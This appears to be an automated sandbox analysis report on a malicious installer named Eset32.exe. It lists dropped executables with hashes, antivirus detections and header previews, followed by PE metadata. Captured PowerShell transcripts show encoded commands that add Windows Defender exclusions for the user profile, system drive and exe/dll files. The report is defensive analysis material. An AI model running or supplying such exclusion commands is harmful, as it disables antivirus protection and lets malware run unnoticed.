                                                    Preview:PSMODULECACHE.....yH.8...I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption........l:]2...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1........Get-CIPolicyInfo........Get-CIPolicyIdInfo........Set-CIPolicySetting........Merge-CIPolicy........Edit-CIPolicyRule........Set-CIPolicyVersion........Set-CIPolicyIdInfo........ConvertFrom-CIPolicy........Set-HVCIOptions........Add-SignerRule........New-CIPolicy........Get-SystemDriver........Set-RuleOption........Get-CIPolicy......
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1280
                                                    Entropy (8bit):5.370793881110786
                                                    Encrypted:false
                                                    SSDEEP:24:3RPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKaRSF8PJKnKwl9OVMn:hPerB4nqRL/Hvfe9t4CvpR48B47Hzn
                                                    MD5:C670369412C03F8FA7DBD5472B975480
                                                    SHA1:1EABE685DDD1AB29F6BC8CE34AD8C7E51CCC0E20
                                                    SHA-256:EC2FED6FF59CE8D4D74B89B554CA364A470C45515C96D8C7E8FE76A0E5788BFB
                                                    SHA-512:D9A64D79B98BC9B8B97B26422797BA97EA25CD23066349B51520E05A6F85F6033739A6B183CB3A45D416991AA1A6C9AEC184EE120C07732A364DFD0DD21D5519
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementT...............}0.2...K.............*.Microsoft.Management.Inf
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1
                                                    Process:C:\Users\user\Desktop\Eset32.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4462384
                                                    Entropy (8bit):5.902632936497891
                                                    Encrypted:false
                                                    SSDEEP:98304:4TrAyVoOVqO5uJFH6Ws49BRo0MWTNJH7apTgVijzPM/zyQIIU/jHwPe1mKJB:lyMFobXmijLczyYU7H5Z7
                                                    MD5:D9F92868EEE8D3C8ECD29A7969419D29
                                                    SHA1:0A74749DFCD4ECA403859431EBB18BA2A7E845BF
                                                    SHA-256:B7154023E4778AC19EE6885BF403BF20CE675EF4B87F816E379FA98293526BE3
                                                    SHA-512:5F29374B1BC47F8A978D03476BD8727DCB42B0D6AD028A6DECDBBF41363C70001EA017888B5E8A44326D86D2F2FDFE39ADE6C27861B7AA317F2F09A62BAE95F7
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 37%
                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0;b..................B..@................B...@...........................C...............................................C.<.....................C.0I..........................................h.C.@.............B.\............................text...e?.......@.................. ..`.QDwHSV..Q@..P...R@..D.............. ..`.rdata..~.....B.......B.............@..@.data.........C.......C.............@....5{mr ........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Eset32.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2149888
                                                    Entropy (8bit):7.992953608237496
                                                    Encrypted:true
                                                    SSDEEP:49152:+N1rE8yADMs6VVlywsIQH4V6Egj8ifqeuN9aDndygIRU:+ECDHWVlsZedgZfqeUChz
                                                    MD5:7ADD9A3AB1734828F756F2725C452C9A
                                                    SHA1:8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629
                                                    SHA-256:DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
                                                    SHA-512:CD8582431009BA4B192D73E6E0494318D73E02993C9981C16F7481B30395F8DB9CDAF11B6D0D00AC487BE511CFFD5479FA70BCF5BB713CFAA7EDF7E8E87663F9
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 60%
                                                    • Antivirus: ReversingLabs, Detection: 60%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....1;b.........."....... .............. .....@..... ........................!...........@...@......@............... ................................ ............... .."........................................................................... ..H............text..... .. .... ................. ..`.rsrc......... ....... .............@..@........................................H.......l4 .<.......;...................................................&...=W...#.".H..e._@....;.'z?.[sY... #)Lt........./2,.k..u..,W.m|..K.....,o...9G..Xt..'_.pN.3~.4...X.E....J6.[..,..r..wx.pE.....e..g...is.#.........l..E..F.f$1....".....f.-...yp......(.%ns..?^tc.Yw......%..t..rI.F..C.C"..j%.go$z.o.uAZ.......h......s.0..W-Yf......A.P.H]3.".sv....g.z.Q.S...l..55.`..w)c..Hx..;...t....a...J..l.(.T.4.;d...`..~..06T0.....c.".N.._.R..6.......U...4........g7$?L/..W.kJ.
                                                    Process:C:\Users\user\AppData\Roaming\12.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2149888
                                                    Entropy (8bit):7.992953608237496
                                                    Encrypted:true
                                                    SSDEEP:49152:+N1rE8yADMs6VVlywsIQH4V6Egj8ifqeuN9aDndygIRU:+ECDHWVlsZedgZfqeUChz
                                                    MD5:7ADD9A3AB1734828F756F2725C452C9A
                                                    SHA1:8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629
                                                    SHA-256:DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
                                                    SHA-512:CD8582431009BA4B192D73E6E0494318D73E02993C9981C16F7481B30395F8DB9CDAF11B6D0D00AC487BE511CFFD5479FA70BCF5BB713CFAA7EDF7E8E87663F9
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 60%
                                                    • Antivirus: ReversingLabs, Detection: 60%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....1;b.........."....... .............. .....@..... ........................!...........@...@......@............... ................................ ............... .."........................................................................... ..H............text..... .. .... ................. ..`.rsrc......... ....... .............@..@........................................H.......l4 .<.......;...................................................&...=W...#.".H..e._@....;.'z?.[sY... #)Lt........./2,.k..u..,W.m|..K.....,o...9G..Xt..'_.pN.3~.4...X.E....J6.[..,..r..wx.pE.....e..g...is.#.........l..E..F.f$1....".....f.-...yp......(.%ns..?^tc.Yw......%..t..rI.F..C.C"..j%.go$z.o.uAZ.......h......s.0..W-Yf......A.P.H]3.".sv....g.z.Q.S...l..55.`..w)c..Hx..;...t....a...J..l.(.T.4.;d...`..~..06T0.....c.".N.._.R..6.......U...4........g7$?L/..W.kJ.
                                                    Process:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):66560
                                                    Entropy (8bit):5.675775271948851
                                                    Encrypted:false
                                                    SSDEEP:768:aQ//9WZSGIDUYU/+sdVaBk5EedlAiAJA1kt88ryseCmcgu+L5NtQEUF9zu1w13ue:JIZFIudWjtjOcfgpLpw13u9RGnlp3
                                                    MD5:E2DD8887AEE175EF9BEFD87B2F6105B3
                                                    SHA1:DFC0527E7425EF633DB3DB034E2E3DB8E09F9B28
                                                    SHA-256:C09D1684236D9CE1D7E0C1C14119B4DC84CBC841DA4F4FB84131AA0F367F38F1
                                                    SHA-512:2313792B160D1D6E28BC2CC2D45BA25773BD5CA1434026316181088C4385C9265922174D65DFAC377768024F67F7B9E4CB1B9B6A4FA08606324797E4E1F1E93F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 30%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...m1;b................................. ....@...... .......................@............@...@......@............... ............................... ..@............................................................................................ ..H............text........ ...................... ..`.rsrc...@.... ......................@..@........................................H...........0g..............n............................................(....*...(0...*.0.......... ........8........E............8....*.~....~<...(.....(......... ....(....:....& ....8........E........$...8....(.... ....(....:....& ....8........& ....(....9....&8........E........*...8.....~>...(.... ....(....9....& ....8.....:... ....(....9....&8...........&.n..V.....0.......... ........8........E....................8....*.r...p.. /...8........E1...................!...P......._...
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.526227340041785
                                                    Encrypted:false
                                                    SSDEEP:96:BZZ/8N2cLqDo1ZJFZd/8N2cLqDo1ZA3x1xvxjZf/8N2cLqDo1ZFSx/x/xWeZ4H:lcdcic7fH
                                                    MD5:2A07327783C8C059278FB8131A15BC86
                                                    SHA1:72A793666AD245E17EE327066392AAB66F4A8578
                                                    SHA-256:428716E884350ADB02D14DC21BF1832BE3CFFEADC03F91889BE8EAC50B8F822C
                                                    SHA-512:9FC92E8F0D6D9CE6364F3C4CE486C15667856B01BC36C9630F6673E31012C2DFF60132AFA7EA813ED14031E602E9B24841755CC8F8299C4DD5CC163D094674CB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221056..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 6236..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221056..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.524487604789142
                                                    Encrypted:false
                                                    SSDEEP:96:BZL/8N2cYqDo1ZDFZd/8N2cYqDo1Zo3x1xvxjZ4/8N2cYqDo1ZySx/x/xpZq:XcQcWcB
                                                    MD5:F0330880F2F7BDF92334BE868A3E2B76
                                                    SHA1:7FB360CC5173C1C87BA2A9D8B46733092212BE7D
                                                    SHA-256:579A82C295646CF09AD1D49D893B5AE26584C825202E65337B29778D9CEAA73E
                                                    SHA-512:3C8334679B855BD1B2893326322B7BEBFE3CE55DE0DBA67CDD9FB2C4CE26B119903017F81EB5FFDC6765DCAC3116181DFCC58E7BC5F775C56275B032C13BBF70
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5832..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221050..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5764
                                                    Entropy (8bit):5.524393941447013
                                                    Encrypted:false
                                                    SSDEEP:96:BZw/8N2AMiqDo1ZLZI/8N2AMiqDo1ZRgC4jZ9/8N2AMiqDo1ZSBoouZl:0tzW
                                                    MD5:FD595612596392EF16B26200199439F4
                                                    SHA1:06112F5363BFC9E636106AE33A263079CA122830
                                                    SHA-256:7495F81371E9D6D4316B38A94A66D63597C21ED48170B36D87E2643086D6528F
                                                    SHA-512:FD3CD847DACE784FBEB6C2680CC9543100DDC8E855394A80A1FB6D31ADF9D3FAE1FDBA3FE4043CEF98318AA2BED01B61037ABFDB6443E40BA5DDA878B5BCDBC8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221114..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6536..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221114..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220324221231..Username: computer\user..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5764
                                                    Entropy (8bit):5.522947101485942
                                                    Encrypted:false
                                                    SSDEEP:96:BZI/8N2AM2tqDo1ZbZY/8N2AM2tqDo1Z8gC4jZ2/8N2AM2tqDo1ZUBooOZR:E/t+
                                                    MD5:75A1F14AC41D6806DAA818318C905D78
                                                    SHA1:BC191AECDC22CA7B0EA9EDCE1C630EA0413F03A1
                                                    SHA-256:469CD3329590793020ED92B36F3B62FEDCDB0C4281DB636C0FF0D31FFEC0EFEF
                                                    SHA-512:D742DBE9478175D35AEF470C444631E8BBDF83AAE27DF0B297B611856FB77FF6C0301B0D48068C71BDFFA47853B79EA61DFA1DBB5BFA371D62F1973ACB651947
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221019..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6332..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221019..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220324221136..Username: computer\user..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.525103873550551
                                                    Encrypted:false
                                                    SSDEEP:96:BZa/8N2c4qDo1ZqLFZUm/8N2c4qDo1Zr3x1xvxjZl/8N2c4qDo1Z7Sx/x/xCZJ:OcNAOcmcY
                                                    MD5:96B72526B59BA604F3C8CEB114B96D15
                                                    SHA1:DAA9D1365D4766A78CB16003EFDE94D9E9B8F786
                                                    SHA-256:E58278B16390EA93E36F7E0769530BB23666CBC8946916A3F0E2B768CBAE9C1A
                                                    SHA-512:84AAFCA8526DC56CEDCC2466DD7AAF9FCA9D8F4755B2D63009962EF803DC0ACFE30FC40617D0A3018DB20CF43A843D3F1022D8700A0B47DA93A228E94A3044B8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324220951..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 2600..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324220951..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.986911660203424
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Eset32.exe
                                                    File size:4139932
                                                    MD5:b405bf6533c047b1a47ceced3b42c23b
                                                    SHA1:bbb321d380c3f9d17e49a9f2167234742e292e4d
                                                    SHA256:5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
                                                    SHA512:662af21fa3c267ca3a7b451d1a969e1b2dc4fd197368a066e7273b51673bf6def91b02b4d5e429c3b6947a5c97ceb17703b0e716eb6e6dc5a146ca2af40a4c82
                                                    SSDEEP:98304:52NBK/xafUdOXhsemQTJSDVnAjKU4trvh9L9mxSSKKE:KU48cXhsehTEVnPBo/E
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@
                                                    Icon Hash:70f0ca9692f2f071
                                                    Entrypoint:0x403348
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:ced282d9b261d1462772017fe2f6972b
                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:
                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
